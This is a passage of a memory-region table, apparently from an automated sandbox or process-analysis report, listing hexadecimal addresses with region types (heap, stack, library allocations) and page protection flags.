page read and write
|
||
14B3732E000
|
heap
|
page read and write
|
||
7FF8A92D0000
|
unkown
|
page readonly
|
||
7FF8BA258000
|
unkown
|
page read and write
|
||
94112FF000
|
stack
|
page read and write
|
||
1E1A1EEE000
|
heap
|
page read and write
|
||
27258B11000
|
heap
|
page read and write
|
||
ED9D4FF000
|
unkown
|
page read and write
|
||
28B63338000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28E2ED14000
|
heap
|
page read and write
|
||
1436D9D5000
|
heap
|
page read and write
|
||
7DF46D2E0000
|
trusted library allocation
|
page execute and read and write
|
||
28C87789000
|
heap
|
page read and write
|
||
257A315A000
|
heap
|
page read and write
|
||
16180325000
|
heap
|
page read and write
|
||
257A314C000
|
heap
|
page read and write
|
||
28C87CB0000
|
heap
|
page read and write
|
||
28C87DA0000
|
heap
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
7FF7F7F08000
|
unkown
|
page read and write
|
||
257A3125000
|
heap
|
page read and write
|
||
28E2CEC6000
|
heap
|
page read and write
|
||
17341166000
|
heap
|
page read and write
|
||
18EBB7F8000
|
heap
|
page read and write
|
||
28C88794000
|
heap
|
page read and write
|
||
4B4C33E000
|
stack
|
page read and write
|
||
153715A6000
|
heap
|
page read and write
|
||
7FF73AE11000
|
unkown
|
page execute read
|
||
21AD47A0000
|
heap
|
page read and write
|
||
1E1A0058000
|
heap
|
page read and write
|
||
28C876A3000
|
heap
|
page read and write
|
||
25CAEA20000
|
heap
|
page read and write
|
||
18EBB305000
|
heap
|
page read and write
|
||
28C88CDB000
|
heap
|
page read and write
|
||
7FF847882000
|
trusted library allocation
|
page read and write
|
||
20C0AC74000
|
heap
|
page read and write
|
||
1F23DCB1000
|
direct allocation
|
page read and write
|
||
18EBB0F4000
|
heap
|
page read and write
|
||
7FF8A86E1000
|
unkown
|
page execute and read and write
|
||
1BC8A8A2000
|
heap
|
page read and write
|
||
28C87789000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
7FF847750000
|
trusted library allocation
|
page read and write
|
||
1F23A7B8000
|
heap
|
page read and write
|
||
7DF46D2C0000
|
trusted library allocation
|
page execute and read and write
|
||
28C87D23000
|
heap
|
page read and write
|
||
AC26BFF000
|
unkown
|
page read and write
|
||
21AD4637000
|
heap
|
page read and write
|
||
19322360000
|
heap
|
page read and write
|
||
22AE13CA000
|
heap
|
page read and write
|
||
408188000
|
stack
|
page read and write
|
||
28C8768B000
|
heap
|
page read and write
|
||
1F23DC30000
|
direct allocation
|
page read and write
|
||
28C88F30000
|
direct allocation
|
page read and write
|
||
7FF847900000
|
trusted library allocation
|
page read and write
|
||
28C877D4000
|
heap
|
page read and write
|
||
173422D0000
|
heap
|
page read and write
|
||
28C88806000
|
heap
|
page read and write
|
||
1F23A741000
|
heap
|
page read and write
|
||
1436DA0B000
|
heap
|
page read and write
|
||
17341167000
|
heap
|
page read and write
|
||
28E2ED1E000
|
heap
|
page read and write
|
||
1F23A720000
|
heap
|
page read and write
|
||
21AD4641000
|
heap
|
page read and write
|
||
28C87322000
|
heap
|
page read and write
|
||
18EBB0CC000
|
heap
|
page read and write
|
||
16183198000
|
trusted library allocation
|
page read and write
|
||
1F23A7C1000
|
heap
|
page read and write
|
||
1AC9F6BA000
|
heap
|
page read and write
|
||
18EBB0F4000
|
heap
|
page read and write
|
||
27258B11000
|
heap
|
page read and write
|
||
1436DBF3000
|
heap
|
page read and write
|
||
28C87CD4000
|
heap
|
page read and write
|
||
4B4BE7E000
|
stack
|
page read and write
|
||
14B354C0000
|
heap
|
page read and write
|
||
28E2CD70000
|
trusted library allocation
|
page read and write
|
||
28C877D9000
|
heap
|
page read and write
|
||
7FF847AD0000
|
trusted library allocation
|
page read and write
|
||
15373693000
|
heap
|
page read and write
|
||
18EBB0D8000
|
heap
|
page read and write
|
||
28C87D9B000
|
heap
|
page read and write
|
||
4B4CF0D000
|
stack
|
page read and write
|
||
1429BB30000
|
heap
|
page read and write
|
||
28E2ED13000
|
heap
|
page read and write
|
||
16180170000
|
heap
|
page read and write
|
||
17342260000
|
heap
|
page read and write
|
||
1F23A7B0000
|
heap
|
page read and write
|
||
153737BA000
|
heap
|
page read and write
|
||
1436E132000
|
heap
|
page read and write
|
||
28C88680000
|
direct allocation
|
page read and write
|
||
2109AFC000
|
stack
|
page read and write
|
||
94113FE000
|
stack
|
page read and write
|
||
18A64DF0000
|
heap
|
page read and write
|
||
1436E10F000
|
heap
|
page read and write
|
||
28C8766F000
|
heap
|
page read and write
|
||
7FF73AE52000
|
unkown
|
page readonly
|
||
234DABC0000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1436D9E3000
|
heap
|
page read and write
|
||
28C87D9A000
|
heap
|
page read and write
|
||
18EBB81D000
|
heap
|
page read and write
|
||
1E1A1EE4000
|
heap
|
page read and write
|
||
14B35524000
|
heap
|
page read and write
|
||
7FF8B8CC1000
|
unkown
|
page execute and read and write
|
||
1436DBF4000
|
heap
|
page read and write
|
||
28C88B34000
|
heap
|
page read and write
|
||
1EE626F0000
|
heap
|
page read and write
|
||
173422E4000
|
heap
|
page read and write
|
||
1E1A064C000
|
heap
|
page read and write
|
||
1F23A7C8000
|
heap
|
page read and write
|
||
E8CB598000
|
stack
|
page read and write
|
||
28C88B73000
|
heap
|
page read and write
|
||
28C87704000
|
heap
|
page read and write
|
||
28C87C68000
|
heap
|
page read and write
|
||
28FE1241000
|
heap
|
page read and write
|
||
1BD201DB000
|
heap
|
page read and write
|
||
28C88B5F000
|
heap
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
28E2CE31000
|
heap
|
page read and write
|
||
48A31BC000
|
stack
|
page read and write
|
||
22AE13A7000
|
heap
|
page read and write
|
||
193225B0000
|
heap
|
page read and write
|
||
28C87CA2000
|
heap
|
page read and write
|
||
14B35A7A000
|
heap
|
page read and write
|
||
234DAB80000
|
heap
|
page read and write
|
||
20D5DE60000
|
heap
|
page read and write
|
||
28C88AF5000
|
heap
|
page read and write
|
||
B6EE9FF000
|
unkown
|
page read and write
|
||
28C87690000
|
heap
|
page read and write
|
||
1734229A000
|
heap
|
page read and write
|
||
4B4C23A000
|
stack
|
page read and write
|
||
7FF73AE10000
|
unkown
|
page readonly
|
||
1E1A0020000
|
heap
|
page read and write
|
||
173422B8000
|
heap
|
page read and write
|
||
17342258000
|
heap
|
page read and write
|
||
1530196F000
|
trusted library allocation
|
page read and write
|
||
22AE1350000
|
heap
|
page read and write
|
||
18EBB818000
|
heap
|
page read and write
|
||
1E1A005A000
|
heap
|
page read and write
|
||
1E1A0046000
|
heap
|
page read and write
|
||
7FF8A8EE6000
|
unkown
|
page execute and read and write
|
||
1F23A7D7000
|
heap
|
page read and write
|
||
7FF847960000
|
trusted library allocation
|
page read and write
|
||
20D5DE7B000
|
heap
|
page read and write
|
||
2720DB29000
|
heap
|
page read and write
|
||
28C87365000
|
heap
|
page read and write
|
||
6AB0BFF000
|
stack
|
page read and write
|
||
1BC8A899000
|
heap
|
page read and write
|
||
28C8735E000
|
heap
|
page read and write
|
||
28E2D485000
|
heap
|
page read and write
|
||
2720D990000
|
heap
|
page read and write
|
||
28C876F1000
|
heap
|
page read and write
|
||
1EE628C0000
|
heap
|
page read and write
|
||
28C88700000
|
direct allocation
|
page read and write
|
||
16182DFF000
|
trusted library allocation
|
page read and write
|
||
21D4D800000
|
heap
|
page read and write
|
||
1733EFBA000
|
heap
|
page read and write
|
||
14B35A8F000
|
heap
|
page read and write
|
||
246E4FC0000
|
heap
|
page read and write
|
||
28C87C76000
|
heap
|
page read and write
|
||
28CC32C7000
|
heap
|
page read and write
|
||
7FF8A865A000
|
unkown
|
page execute and read and write
|
||
15301604000
|
trusted library allocation
|
page read and write
|
||
28C87D6D000
|
heap
|
page read and write
|
||
28E2D4A2000
|
heap
|
page read and write
|
||
1CCD8670000
|
heap
|
page read and write
|
||
246E4FCB000
|
heap
|
page read and write
|
||
17342270000
|
heap
|
page read and write
|
||
7FF8479C3000
|
trusted library allocation
|
page read and write
|
||
1F23DBF0000
|
direct allocation
|
page read and write
|
||
1BD201F1000
|
heap
|
page read and write
|
||
14B35538000
|
heap
|
page read and write
|
||
1E1A0679000
|
heap
|
page read and write
|
||
1E1A003F000
|
heap
|
page read and write
|
||
1F23A8E0000
|
direct allocation
|
page read and write
|
||
28C87358000
|
heap
|
page read and write
|
||
7FF8B9F75000
|
unkown
|
page execute and read and write
|
||
D6C9EFF000
|
unkown
|
page read and write
|
||
7FF8A86A7000
|
unkown
|
page execute and write copy
|
||
28C87C70000
|
heap
|
page read and write
|
||
1436F9B6000
|
heap
|
page read and write
|
||
1F23DD3D000
|
direct allocation
|
page read and write
|
||
7FF8B93D3000
|
unkown
|
page execute and read and write
|
||
28C887AD000
|
heap
|
page read and write
|
||
28C87C76000
|
heap
|
page read and write
|
||
28C87AD4000
|
heap
|
page read and write
|
||
17341164000
|
heap
|
page read and write
|
||
28C87D7E000
|
heap
|
page read and write
|
||
7FF847860000
|
trusted library allocation
|
page execute and read and write
|
||
1AC9F68B000
|
heap
|
page read and write
|
||
7FF8B8CD0000
|
unkown
|
page readonly
|
||
1619A4F4000
|
heap
|
page read and write
|
||
28C87D18000
|
heap
|
page read and write
|
||
18EBD250000
|
heap
|
page read and write
|
||
7FF8479A0000
|
trusted library allocation
|
page read and write
|
||
241A8550000
|
heap
|
page read and write
|
||
28C877D4000
|
heap
|
page read and write
|
||
7FF8A8B98000
|
unkown
|
page execute and read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
20D5FC70000
|
heap
|
page read and write
|
||
E4DF72C000
|
stack
|
page read and write
|
||
68D9FFF000
|
stack
|
page read and write
|
||
28C87C10000
|
heap
|
page read and write
|
||
4B4BEFC000
|
stack
|
page read and write
|
||
28C88B49000
|
heap
|
page read and write
|
||
1C7FBA61000
|
heap
|
page read and write
|
||
1E19FFCA000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
14B35521000
|
heap
|
page read and write
|
||
1436DA29000
|
heap
|
page read and write
|
||
28E2CE31000
|
heap
|
page read and write
|
||
28C88F10000
|
direct allocation
|
page read and write
|
||
1F23A87B000
|
direct allocation
|
page read and write
|
||
28C87C68000
|
heap
|
page read and write
|
||
1734229A000
|
heap
|
page read and write
|
||
7FF847A20000
|
trusted library allocation
|
page read and write
|
||
28C87358000
|
heap
|
page read and write
|
||
28C88A33000
|
heap
|
page read and write
|
||
28C88610000
|
direct allocation
|
page read and write
|
||
7FF847B00000
|
trusted library allocation
|
page read and write
|
||
1436DA2B000
|
heap
|
page read and write
|
||
14B35A77000
|
heap
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
14B35530000
|
heap
|
page read and write
|
||
1F23A7E7000
|
heap
|
page read and write
|
||
1436E139000
|
heap
|
page read and write
|
||
1F23A769000
|
heap
|
page read and write
|
||
28C85906000
|
heap
|
page read and write
|
||
182DF900000
|
heap
|
page read and write
|
||
28C88650000
|
direct allocation
|
page read and write
|
||
17341164000
|
heap
|
page read and write
|
||
1618214F000
|
trusted library allocation
|
page read and write
|
||
2BAD97F0000
|
heap
|
page read and write
|
||
26CD2760000
|
heap
|
page read and write
|
||
1BD201F1000
|
heap
|
page read and write
|
||
1BF4F6A0000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
1BD20160000
|
heap
|
page read and write
|
||
28C876DF000
|
heap
|
page read and write
|
||
28C87CD7000
|
heap
|
page read and write
|
||
28C88B51000
|
heap
|
page read and write
|
||
18EBB0EF000
|
heap
|
page read and write
|
||
161802E0000
|
trusted library allocation
|
page read and write
|
||
1E19FFC0000
|
heap
|
page read and write
|
||
26CD27CB000
|
heap
|
page read and write
|
||
1E1A0657000
|
heap
|
page read and write
|
||
28C87D01000
|
heap
|
page read and write
|
||
1E1A0058000
|
heap
|
page read and write
|
||
28C877CE000
|
heap
|
page read and write
|
||
18EBB800000
|
heap
|
page read and write
|
||
7FF8B8F9C000
|
unkown
|
page read and write
|
||
7FF73AE52000
|
unkown
|
page readonly
|
||
28E2CE17000
|
heap
|
page read and write
|
||
28C87308000
|
heap
|
page read and write
|
||
173412A6000
|
heap
|
page read and write
|
||
1E1A01B0000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
941127F000
|
stack
|
page read and write
|
||
28C87D9B000
|
heap
|
page read and write
|
||
14B35A77000
|
heap
|
page read and write
|
||
1436DC7B000
|
heap
|
page read and write
|
||
28C88B51000
|
heap
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
18EBB105000
|
heap
|
page read and write
|
||
28C88B6F000
|
heap
|
page read and write
|
||
28C88B6F000
|
heap
|
page read and write
|
||
28FE1241000
|
heap
|
page read and write
|
||
1E1A1EE6000
|
heap
|
page read and write
|
||
28C8763D000
|
heap
|
page read and write
|
||
1436DA07000
|
heap
|
page read and write
|
||
28C87789000
|
heap
|
page read and write
|
||
28C88794000
|
heap
|
page read and write
|
||
17342260000
|
heap
|
page read and write
|
||
21AD4637000
|
heap
|
page read and write
|
||
26CD27E1000
|
heap
|
page read and write
|
||
7FF8A8592000
|
unkown
|
page execute and read and write
|
||
28C88710000
|
heap
|
page read and write
|
||
1E1A0032000
|
heap
|
page read and write
|
||
28C88A09000
|
heap
|
page read and write
|
||
B5137FF000
|
stack
|
page read and write
|
||
28C87DBE000
|
heap
|
page read and write
|
||
28C87358000
|
heap
|
page read and write
|
||
28FE1241000
|
heap
|
page read and write
|
||
25CAEB20000
|
heap
|
page read and write
|
||
28C88B31000
|
heap
|
page read and write
|
||
7FF8478E0000
|
trusted library allocation
|
page read and write
|
||
28C87C3C000
|
heap
|
page read and write
|
||
28C87DDF000
|
heap
|
page read and write
|
||
1618330A000
|
trusted library allocation
|
page read and write
|
||
1BD201F1000
|
heap
|
page read and write
|
||
28C87C74000
|
heap
|
page read and write
|
||
7FF8B984A000
|
unkown
|
page execute and write copy
|
||
1E19FFE8000
|
heap
|
page read and write
|
||
28C873DD000
|
heap
|
page read and write
|
||
808214C000
|
stack
|
page read and write
|
||
1F23A680000
|
heap
|
page read and write
|
||
40857F000
|
stack
|
page read and write
|
||
28C87520000
|
direct allocation
|
page read and write
|
||
1F23A75A000
|
heap
|
page read and write
|
||
27258B11000
|
heap
|
page read and write
|
||
7FF847890000
|
trusted library allocation
|
page execute and read and write
|
||
28C87C79000
|
heap
|
page read and write
|
||
28E2CE2F000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C88640000
|
direct allocation
|
page read and write
|
||
25CAEC40000
|
heap
|
page read and write
|
||
28C88B85000
|
heap
|
page read and write
|
||
28E2CE45000
|
heap
|
page read and write
|
||
22AE12A0000
|
heap
|
page read and write
|
||
22AE13BD000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C87D8E000
|
heap
|
page read and write
|
||
B4AF97F000
|
stack
|
page read and write
|
||
28E2CFBE000
|
heap
|
page read and write
|
||
28C88F40000
|
direct allocation
|
page read and write
|
||
28C87BFE000
|
heap
|
page read and write
|
||
28C873A4000
|
heap
|
page read and write
|
||
28FE15B0000
|
heap
|
page read and write
|
||
14B35AA9000
|
heap
|
page read and write
|
||
28C87CD4000
|
heap
|
page read and write
|
||
266C3E50000
|
heap
|
page read and write
|
||
28C87376000
|
heap
|
page read and write
|
||
28FE15B5000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C87C6F000
|
heap
|
page read and write
|
||
7FF8A81AA000
|
unkown
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
7FF847A10000
|
trusted library allocation
|
page read and write
|
||
18A64BC0000
|
heap
|
page read and write
|
||
28C88754000
|
heap
|
page read and write
|
||
1E1A0058000
|
heap
|
page read and write
|
||
7FF8476FC000
|
trusted library allocation
|
page execute and read and write
|
||
54EBB9C000
|
stack
|
page read and write
|
||
1436F9C4000
|
heap
|
page read and write
|
||
1436E11C000
|
heap
|
page read and write
|
||
7FF8A8860000
|
unkown
|
page readonly
|
||
1436DA0C000
|
heap
|
page read and write
|
||
28C88B69000
|
heap
|
page read and write
|
||
28C87BFE000
|
heap
|
page read and write
|
||
18EBB807000
|
heap
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
28C87D59000
|
heap
|
page read and write
|
||
28C87CD4000
|
heap
|
page read and write
|
||
18EBB110000
|
heap
|
page read and write
|
||
1F23A743000
|
heap
|
page read and write
|
||
2BAD97FB000
|
heap
|
page read and write
|
||
1C7FBA40000
|
heap
|
page read and write
|
||
28CC31B0000
|
heap
|
page read and write
|
||
1618359A000
|
trusted library allocation
|
page read and write
|
||
7FF73AE4E000
|
unkown
|
page write copy
|
||
7FF8A8861000
|
unkown
|
page execute and read and write
|
||
20D5DEBE000
|
heap
|
page read and write
|
||
2545B38A000
|
heap
|
page read and write
|
||
28C88F20000
|
direct allocation
|
page read and write
|
||
4B4C3BF000
|
stack
|
page read and write
|
||
14B35410000
|
trusted library allocation
|
page read and write
|
||
17341080000
|
heap
|
page read and write
|
||
7FF8A86E0000
|
unkown
|
page readonly
|
||
7FF8BFAB9000
|
unkown
|
page execute and read and write
|
||
28E2CDF2000
|
heap
|
page read and write
|
||
28C88680000
|
direct allocation
|
page read and write
|
||
28C87333000
|
heap
|
page read and write
|
||
28C877BD000
|
heap
|
page read and write
|
||
1D6085D0000
|
heap
|
page read and write
|
||
15371690000
|
heap
|
page read and write
|
||
28C88A73000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1BC8A8AC000
|
heap
|
page read and write
|
||
28C87CD4000
|
heap
|
page read and write
|
||
14B35506000
|
heap
|
page read and write
|
||
14B35A87000
|
heap
|
page read and write
|
||
1530008C000
|
trusted library allocation
|
page read and write
|
||
28C87CF8000
|
heap
|
page read and write
|
||
28C88B34000
|
heap
|
page read and write
|
||
28C87CB0000
|
heap
|
page read and write
|
||
7FF8479E2000
|
trusted library allocation
|
page read and write
|
||
28C87D9A000
|
heap
|
page read and write
|
||
17340970000
|
heap
|
page read and write
|
||
18EBB80F000
|
heap
|
page read and write
|
||
32C73CF000
|
stack
|
page read and write
|
||
173422E4000
|
heap
|
page read and write
|
||
1F23A880000
|
direct allocation
|
page read and write
|
||
1F23A766000
|
heap
|
page read and write
|
||
28C87631000
|
heap
|
page read and write
|
||
E4DFA7F000
|
stack
|
page read and write
|
||
1CCD86C3000
|
heap
|
page read and write
|
||
28C88620000
|
direct allocation
|
page read and write
|
||
1429BA50000
|
heap
|
page read and write
|
||
7FF8B8CF3000
|
unkown
|
page read and write
|
||
28C88842000
|
heap
|
page read and write
|
||
15310010000
|
trusted library allocation
|
page read and write
|
||
28C88FB0000
|
direct allocation
|
page read and write
|
||
14B35A8C000
|
heap
|
page read and write
|
||
28C87C29000
|
heap
|
page read and write
|
||
7FF8478A0000
|
trusted library allocation
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
18EBB824000
|
heap
|
page read and write
|
||
1734229A000
|
heap
|
page read and write
|
||
26CD27D9000
|
heap
|
page read and write
|
||
28E2CE33000
|
heap
|
page read and write
|
||
89022FF000
|
stack
|
page read and write
|
||
1BF4F5A0000
|
heap
|
page read and write
|
||
18EBB2A0000
|
trusted library allocation
|
page read and write
|
||
28C88A2D000
|
heap
|
page read and write
|
||
28C88794000
|
heap
|
page read and write
|
||
7FF8B9088000
|
unkown
|
page execute and read and write
|
||
20D5DE7F000
|
heap
|
page read and write
|
||
1B839BD0000
|
heap
|
page read and write
|
||
14B35A74000
|
heap
|
page read and write
|
||
18EBB0E3000
|
heap
|
page read and write
|
||
257A3070000
|
heap
|
page read and write
|
||
28C877BD000
|
heap
|
page read and write
|
||
288163F000
|
stack
|
page read and write
|
||
28C881C8000
|
direct allocation
|
page read and write
|
||
28C87E2A000
|
heap
|
page read and write
|
||
2720DA90000
|
heap
|
page read and write
|
||
193223A0000
|
heap
|
page read and write
|
||
1733EF64000
|
heap
|
page read and write
|
||
28FE1241000
|
heap
|
page read and write
|
||
18EBB280000
|
heap
|
page read and write
|
||
7FF8476C0000
|
trusted library allocation
|
page read and write
|
||
28E2CE3D000
|
heap
|
page read and write
|
||
16191F6E000
|
trusted library allocation
|
page read and write
|
||
28C87DA2000
|
heap
|
page read and write
|
||
1436E10E000
|
heap
|
page read and write
|
||
1436E107000
|
heap
|
page read and write
|
||
7FF8B8CD1000
|
unkown
|
page execute and read and write
|
||
28C88B55000
|
heap
|
page read and write
|
||
2238CFA0000
|
heap
|
page read and write
|
||
257A315A000
|
heap
|
page read and write
|
||
28C87CA2000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28E2CE37000
|
heap
|
page read and write
|
||
1AC9F6B4000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C88B7D000
|
heap
|
page read and write
|
||
18EBB6AA000
|
heap
|
page read and write
|
||
6A08AFF000
|
stack
|
page read and write
|
||
18A64C21000
|
heap
|
page read and write
|
||
F134E8000
|
stack
|
page read and write
|
||
28C873A4000
|
heap
|
page read and write
|
||
4B4BB5F000
|
stack
|
page read and write
|
||
1F23A74B000
|
heap
|
page read and write
|
||
1436D9FE000
|
heap
|
page read and write
|
||
1932238B000
|
heap
|
page read and write
|
||
15371720000
|
trusted library allocation
|
page read and write
|
||
246E4F90000
|
heap
|
page read and write
|
||
1F23A7C9000
|
heap
|
page read and write
|
||
28C8774D000
|
heap
|
page read and write
|
||
28C87DAA000
|
heap
|
page read and write
|
||
1E1A0033000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
1619A443000
|
heap
|
page read and write
|
||
161802C0000
|
trusted library allocation
|
page read and write
|
||
153101B8000
|
trusted library allocation
|
page read and write
|
||
1619A490000
|
heap
|
page read and write
|
||
28C87D9A000
|
heap
|
page read and write
|
||
28E2CE4C000
|
heap
|
page read and write
|
||
28C87CB0000
|
heap
|
page read and write
|
||
18EBB6A4000
|
heap
|
page read and write
|
||
1436DA25000
|
heap
|
page read and write
|
||
20D5E075000
|
heap
|
page read and write
|
||
1BD20050000
|
heap
|
page read and write
|
||
1E1A1EE0000
|
heap
|
page read and write
|
||
14B37320000
|
heap
|
page read and write
|
||
28C88B69000
|
heap
|
page read and write
|
||
28C87DAA000
|
heap
|
page read and write
|
||
14B35AA9000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C88B5F000
|
heap
|
page read and write
|
||
28C87190000
|
heap
|
page read and write
|
||
28C8873B000
|
heap
|
page read and write
|
||
28C88640000
|
direct allocation
|
page read and write
|
||
17341164000
|
heap
|
page read and write
|
||
7FF847890000
|
trusted library allocation
|
page read and write
|
||
173422B2000
|
heap
|
page read and write
|
||
1618318C000
|
trusted library allocation
|
page read and write
|
||
1429BA50000
|
heap
|
page read and write
|
||
9410F5B000
|
stack
|
page read and write
|
||
7FF847AA0000
|
trusted library allocation
|
page read and write
|
||
28C87BFE000
|
heap
|
page read and write
|
||
1E1A0048000
|
heap
|
page read and write
|
||
28C8874B000
|
heap
|
page read and write
|
||
28C88763000
|
heap
|
page read and write
|
||
7FF8476A2000
|
trusted library allocation
|
page read and write
|
||
18EBB0CA000
|
heap
|
page read and write
|
||
DFF4DFF000
|
stack
|
page read and write
|
||
28B63515000
|
heap
|
page read and write
|
||
1E1A005F000
|
heap
|
page read and write
|
||
F137FD000
|
stack
|
page read and write
|
||
182DF99B000
|
heap
|
page read and write
|
||
16183A84000
|
trusted library allocation
|
page read and write
|
||
16191CA1000
|
trusted library allocation
|
page read and write
|
||
1436D9E1000
|
heap
|
page read and write
|
||
1E1A0660000
|
heap
|
page read and write
|
||
28C88B69000
|
heap
|
page read and write
|
||
1619A531000
|
heap
|
page read and write
|
||
234DAD90000
|
heap
|
page read and write
|
||
27258AFA000
|
heap
|
page read and write
|
||
28C87C76000
|
heap
|
page read and write
|
||
28C87D10000
|
heap
|
page read and write
|
||
17341D7E000
|
heap
|
page read and write
|
||
28C87CA8000
|
heap
|
page read and write
|
||
7FF8B9849000
|
unkown
|
page execute and read and write
|
||
1436D9CA000
|
heap
|
page read and write
|
||
28E2CE23000
|
heap
|
page read and write
|
||
7FF8476B0000
|
trusted library allocation
|
page read and write
|
||
17342270000
|
heap
|
page read and write
|
||
1436E12C000
|
heap
|
page read and write
|
||
1F23DC10000
|
direct allocation
|
page read and write
|
||
2BAD9808000
|
heap
|
page read and write
|
||
28E2CFB2000
|
heap
|
page read and write
|
||
7FF8A8851000
|
unkown
|
page execute and write copy
|
||
7FF8478F0000
|
trusted library allocation
|
page read and write
|
||
173422DC000
|
heap
|
page read and write
|
||
1BF4F6D0000
|
heap
|
page read and write
|
||
28C88AEE000
|
heap
|
page read and write
|
||
28C87358000
|
heap
|
page read and write
|
||
1F23A772000
|
heap
|
page read and write
|
||
28C88D9E000
|
heap
|
page read and write
|
||
1E1A0037000
|
heap
|
page read and write
|
||
1B839C2D000
|
heap
|
page read and write
|
||
1429BA50000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
1436D9ED000
|
heap
|
page read and write
|
||
1429BA30000
|
heap
|
page read and write
|
||
1733EFBF000
|
heap
|
page read and write
|
||
28C87C29000
|
heap
|
page read and write
|
||
199D3950000
|
heap
|
page read and write
|
||
28B63130000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
8FA3F6C000
|
stack
|
page read and write
|
||
28C87D91000
|
heap
|
page read and write
|
||
28C87BFE000
|
heap
|
page read and write
|
||
4B4C07E000
|
stack
|
page read and write
|
||
E8CB9FF000
|
stack
|
page read and write
|
||
28C87D97000
|
heap
|
page read and write
|
||
1E1A0018000
|
heap
|
page read and write
|
||
28C87CE0000
|
heap
|
page read and write
|
||
1436DA07000
|
heap
|
page read and write
|
||
28E2CECC000
|
heap
|
page read and write
|
||
28C8876F000
|
heap
|
page read and write
|
||
1E19FFC7000
|
heap
|
page read and write
|
||
97B0FF000
|
stack
|
page read and write
|
||
16183AA4000
|
trusted library allocation
|
page read and write
|
||
4B4C2B8000
|
stack
|
page read and write
|
||
28C8878F000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
199D3997000
|
heap
|
page read and write
|
||
28C87DAA000
|
heap
|
page read and write
|
||
2238D070000
|
heap
|
page read and write
|
||
2D0F7FF000
|
unkown
|
page read and write
|
||
28C88758000
|
heap
|
page read and write
|
||
7FF8B9F78000
|
unkown
|
page read and write
|
||
28C8782D000
|
heap
|
page read and write
|
||
173422B2000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
1733EF4E000
|
heap
|
page read and write
|
||
1C7FBC55000
|
heap
|
page read and write
|
||
14B37334000
|
heap
|
page read and write
|
||
28E2CE20000
|
heap
|
page read and write
|
||
1E1A0660000
|
heap
|
page read and write
|
||
1436D9F0000
|
heap
|
page read and write
|
||
28C881CB000
|
heap
|
page read and write
|
||
1733F0A0000
|
heap
|
page readonly
|
||
1436D9A7000
|
heap
|
page read and write
|
||
7FF8BFAB1000
|
unkown
|
page execute and read and write
|
||
28C876DA000
|
heap
|
page read and write
|
||
7FF8BA253000
|
unkown
|
page readonly
|
||
51AD67B000
|
stack
|
page read and write
|
||
173422E5000
|
heap
|
page read and write
|
||
28C88F60000
|
direct allocation
|
page read and write
|
||
1A6A14D9000
|
heap
|
page read and write
|
||
28C8774A000
|
heap
|
page read and write
|
||
28C858E9000
|
heap
|
page read and write
|
||
1E1A1EF4000
|
heap
|
page read and write
|
||
28E2CEA4000
|
heap
|
page read and write
|
||
28C87322000
|
heap
|
page read and write
|
||
14B35A7A000
|
heap
|
page read and write
|
||
28C87300000
|
heap
|
page read and write
|
||
1E1A0044000
|
heap
|
page read and write
|
||
19322350000
|
heap
|
page read and write
|
||
15373074000
|
heap
|
page read and write
|
||
2238D360000
|
heap
|
page read and write
|
||
28C88760000
|
heap
|
page read and write
|
||
7FF73AE50000
|
unkown
|
page read and write
|
||
28C87D9D000
|
heap
|
page read and write
|
||
28C877C9000
|
heap
|
page read and write
|
||
26CD2AB0000
|
heap
|
page read and write
|
||
15301CBC000
|
trusted library allocation
|
page read and write
|
||
28E2D4A3000
|
heap
|
page read and write
|
||
28C87D9A000
|
heap
|
page read and write
|
||
16191F6A000
|
trusted library allocation
|
page read and write
|
||
18D01A70000
|
heap
|
page read and write
|
||
2BAD9AA0000
|
heap
|
page read and write
|
||
28E2CE7E000
|
heap
|
page read and write
|
||
7FF73AE10000
|
unkown
|
page readonly
|
||
28C88A42000
|
heap
|
page read and write
|
||
28C89900000
|
direct allocation
|
page read and write
|
||
1E1A0040000
|
heap
|
page read and write
|
||
1E19FFF7000
|
heap
|
page read and write
|
||
28C87DCA000
|
heap
|
page read and write
|
||
28C87C68000
|
heap
|
page read and write
|
||
28C87C73000
|
heap
|
page read and write
|
||
28C87D2B000
|
heap
|
page read and write
|
||
1F23A7C1000
|
heap
|
page read and write
|
||
28C87D94000
|
heap
|
page read and write
|
||
28C88B60000
|
heap
|
page read and write
|
||
1A96E473000
|
heap
|
page read and write
|
||
241A8540000
|
heap
|
page read and write
|
||
1733EF50000
|
heap
|
page read and write
|
||
1AC9F660000
|
heap
|
page read and write
|
||
1A96E46A000
|
heap
|
page read and write
|
||
941137F000
|
stack
|
page read and write
|
||
28C8878F000
|
heap
|
page read and write
|
||
153102F0000
|
